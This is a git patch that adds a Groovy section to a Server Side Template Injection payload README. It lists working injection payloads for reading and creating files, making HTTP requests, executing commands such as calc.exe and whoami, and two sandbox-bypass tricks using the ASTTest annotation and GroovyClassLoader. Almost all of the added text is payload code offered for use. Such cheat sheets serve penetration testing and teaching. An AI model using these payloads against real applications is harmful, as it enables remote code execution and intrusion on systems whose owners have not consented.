From 3db4d04467507e8ab2bca719c5ca20bf6b6ca8e2 Mon Sep 17 00:00:00 2001 From: 0x-nope <gianbaldi@gmail.com> Date: Fri, 4 Mar 2022 17:39:28 +0100 Subject: [PATCH] added Groovy EL section --- Server Side Template Injection/README.md | 56 ++++++++++++++++++++++++ 1 file changed, 56 insertions(+) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index b70b1e3..94f00d7 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -15,6 +15,12 @@ * [Freemarker](#freemarker) * [Basic injection](#freemarker---basic-injection) * [Code execution](#freemarker---code-execution) +* [Groovy](#groovy) + * [Basic injection](#groovy---basic-injection) + * [Read/Create file](#groovy---read-and-create-file) + * [HTTP Request](#groovy---http-request) + * [Command execution](#groovy---command-execution) + * [Sandbox bypass](#groovy---sandbox-bypass) * [Handlebars](#handlebars) * [Jade / Codepen](#jade--codepen) * [Java](#java) @@ -184,6 +190,56 @@ ${dwf.newInstance(ec,null)("id")} --- +## Groovy + +[Official website](https://groovy-lang.org/) + + +### Groovy - Basic injection + +Refer to https://groovy-lang.org/syntax.html , but `${9*9}` is the basic injection. + + +### Groovy - Read and create File + +```groovy +String x = new File('c:/windows/notepad.exe').text +String x = new File('/path/to/file').getText('UTF-8') +new File("C:\Temp\FileName.txt").createNewFile(); +``` + +### Groovy - HTTP request: + + +```groovy +"http://www.google.com".toURL().text +new URL("http://www.google.com").getText() +``` + +### Groovy - Command Execution + +```groovy +"calc.exe".exec() +"calc.exe".execute() +this.evaluate("9*9") //(this is a Script) +new org.codehaus.groovy.runtime.MethodClosure("calc.exe","execute").call() +``` + +### Groovy - Sandbox Bypass + +```groovy +@ASTTest(value={assert java.lang.Runtime.getRuntime().exec("whoami")}) +def x +``` + +or + +```groovy +new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x") +``` + +--- + ## Handlebars [Official website](https://handlebarsjs.com/)